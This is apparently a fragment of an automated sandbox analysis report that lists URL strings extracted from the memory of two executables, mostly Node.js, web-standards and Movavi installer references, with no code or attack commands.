Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/10673
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/13435
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/19009
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/2006
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/2119
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/31074
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/3392
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/34532
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35475
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35862
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35981
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/39707
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/39758
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/12342
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/12607
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/21313
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/26334.
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/30958
Source: pKxhpP0spW.exe, 00000001.00000003.2382394323.000000323D781000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/33229
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/33515.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/33661
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/3394
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34010
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34375
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34385
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38248
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38614)
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/standard-things/esm/issues/821.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/tc39/ecma262/issues/1209
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/tc39/proposal-weakrefs
Source: pKxhpP0spW.exe, 00000001.00000003.2382394323.000000323D781000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/vercel/pkg/issues/1589
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://goo.gl/t5IS6M).
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#Replaceable
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-operations
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://jimmy.warting.se/opensource
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: https://movavi.com0/
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://no-color.org/
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/api/fs.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0-headers.tar.gz
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0.tar.gz
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0.tar.gzhttps://nodejs.org/download/release
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://nodejs.org/download/release/v16.16.0/win-x64/node.lib
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://rogueamoeba.com/licensing.
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://rogueamoeba.com/licensing/
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://rogueamoeba.com/licensing/.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://sourcemaps.info/spec.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://stackoverflow.com/a/5501711/3561
Source: motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2598521100.000002144CEB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.movavi.com/resources/webinstaller/release/movavi/vs/vs_win_x64/resources/config.ini
Source: motor1.exe, 00000015.00000002.2598521100.000002144CEB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.movavi.com/resources/webinstaller/release/movavi/vs/vs_win_x64/resources/config.ini4
Source: motor1.exe, 00000004.00000003.2451740824.0000022D5F540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.movavi.com/resources/webinstaller/release/movavi/vs/vs_win_x64/resources/config.init1
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tc39.es/proposal-iterator-helpers/#sec-iteratorprototype.some
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#special-scheme
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#url
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#url-serializing
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://v8.dev/blog/v8-release-89
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, WebUid.dll.4.dr	String found in binary or memory: https://webuid.movavi.com/api/v1/uid
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, WebUid.dll.4.dr	String found in binary or memory: https://webuid.movavi.com/api/v1/uid:
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
